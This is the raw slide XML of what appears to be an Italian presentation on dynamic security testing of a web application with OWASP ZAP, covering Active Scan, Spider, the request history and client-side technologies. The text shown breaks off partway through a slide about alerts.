          <p:cNvPr id="16" name="Immagine 15" descr="Immagine che contiene testo, schermata, Carattere, algebra&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCCA998-4382-2838-C300-BCD64533FCE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081246" y="4798668"/>
            <a:ext cx="3800820" cy="975760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Immagine 17" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{892D2307-38E6-FB58-03B6-F4D75ADBF830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="-1" b="16301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806584" y="2623970"/>
            <a:ext cx="4269356" cy="1202852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Immagine 19" descr="Immagine che contiene testo, schermata, Carattere, documento&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCAADB33-37C1-9C71-2507-88768563596D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806584" y="3834256"/>
            <a:ext cx="4393718" cy="2249362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Immagine 21" descr="Immagine che contiene testo, schermata, Carattere, algebra&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80D764C-122F-8F8E-B7C6-7DD7FC6C8596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3877336" y="5425125"/>
            <a:ext cx="2929248" cy="1015473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2634717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E7F19E0-303F-D977-3556-907DADE26EB3}"/>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err="1"/>
              <a:t>Analisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1"/>
              <a:t>dinamica</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24"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5151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OWSAP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b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È un progetto open source sviluppato dalla Open Web Application Security Project (OWASP), una comunità globale dedicata alla sicurezza delle applicazioni web.</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OWASP ZAP (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Zed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Attack Proxy) è uno strumento utilizzato per testare la sicurezza delle applicazioni web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È specificamente progettato per l’analisi dinamica delle applicazioni web, il che significa che esegue test mentre l’applicazione è in esecuzione.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP ZAP può essere utilizzato per eseguire test di penetrazione, dunque offre varie funzionalità per eseguire attacchi automatizzati e manuali, consentendo di individuare vulnerabilità comuni come SQL Injection, Coss-Site Scripting e Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>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2323801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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Inizialmente è stata effettuata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>una prima analisi manuale, impostando l’URL dell’applicazione target.</a:t>
            </a:r>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 Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2308A160-46A3-E856-E5CF-747EC857AA6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3382745" y="3429000"/>
            <a:ext cx="7772400" cy="2973730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94938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dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Successivamente si è avviata l’analisi automatica, mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</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Durante l'Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, permette di eseguire una scansione automatizzata utilizzando regole predefinite e test specifici per individuare le vulnerabilità comuni. OWASP ZAP invia richieste e analizza le risposte dell'applicazione web per individuare potenziali vulnerabilità comuni come le injection (SQL injection, XSS), le configurazioni insicure, le vulnerabilità nelle autenticazioni e nelle autorizzazioni, e altro ancora.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L’Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> include la fase di Attack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>dove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>vengono eseguiti una serie di attacchi automatizzati </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>per rilevare vulnerabilità comuni come le injection (SQL injection, XSS), le configurazioni insicure, le vulnerabilità nelle autenticazioni e nelle autorizzazioni, e altro ancora. Questi attacchi automatizzati vengono applicati alle richieste inviate all'applicazione web durante l'Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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20121653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dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Durante l’Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è stata abilitata anche la funzione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Spider.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>È un componente separato dall’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, che consente di esplorare in modo automatizzato un'applicazione web per identificare le pagine, i link e le risorse disponibili. Una volta che l'utente ha fornito l'URL, ZAP lo utilizza come punto di partenza per scoprire il sito web. È importante notare che i collegamenti che dirigono l'utente al di fuori del dominio verranno ignorati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>iuta a mappare l'applicazione e assicura che tutte le pagine siano esplorate e analizzate durante l'analisi delle vulnerabilità.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dunque è stato utilizzato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>il test manuale come complemento all’Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e al Spide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>si può </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ottenere una valutazione più completa e accurata della sicurezza dell'applicazione web. Il test manuale permette di approfondire l'analisi su aree specifiche o vulnerabilità più complesse, mentre l’ Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e Spider forniscono una copertura più ampia e una rilevazione automatizzata delle vulnerabilità comuni.</a:t>
            </a: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2796323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r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> sezione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Cronologia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> mostra un registro delle richieste e delle risposte HTTP effettuate durante l'analisi dell'applicazione web. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Questa sezione fornisce un'istantanea degli eventi passati durante la sessione di scansione e può essere utile per esaminare le interazioni tra OWASP ZAP e l'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La sezione Cronologia consente di visualizzare e filtrare le richieste e le risposte precedenti, consentendo di analizzare i dettagli delle singole richieste, controllare i risultati delle risposte e identificare eventuali problemi o comportamenti anomali durante l'analisi dell'applicazione web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pP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24462958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582446" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pP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schermata, testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C574A97D-1590-38FF-8FF8-86CAD4C8D305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156791" y="2772486"/>
            <a:ext cx="7772400" cy="3105252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="972593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Tecnologie utilizzate: client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1F8C86-48B1-9503-1B24-CDB5F45CE9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: HTML (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Markup Language) è il linguaggio di markup utilizzato per creare la struttura e il layout delle pagine web. Viene utilizzato per definire gli elementi della pagina, come testo, immagini, link e tabelle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: JavaScript è un linguaggio di scripting che viene eseguito sul lato client del web browser. Viene utilizzato per aggiungere interattività e funzionalità dinamiche alle pagine web. JavaScript può manipolare il contenuto HTML, rispondere agli eventi degli utenti, effettuare chiamate AJAX per ottenere o inviare dati al server e altro ancora.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Queste tecnologie permettono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>di creare un'interfaccia utente interattiva e della presentazione dei dati agli utenti.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27970715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5435703" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'allerta (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
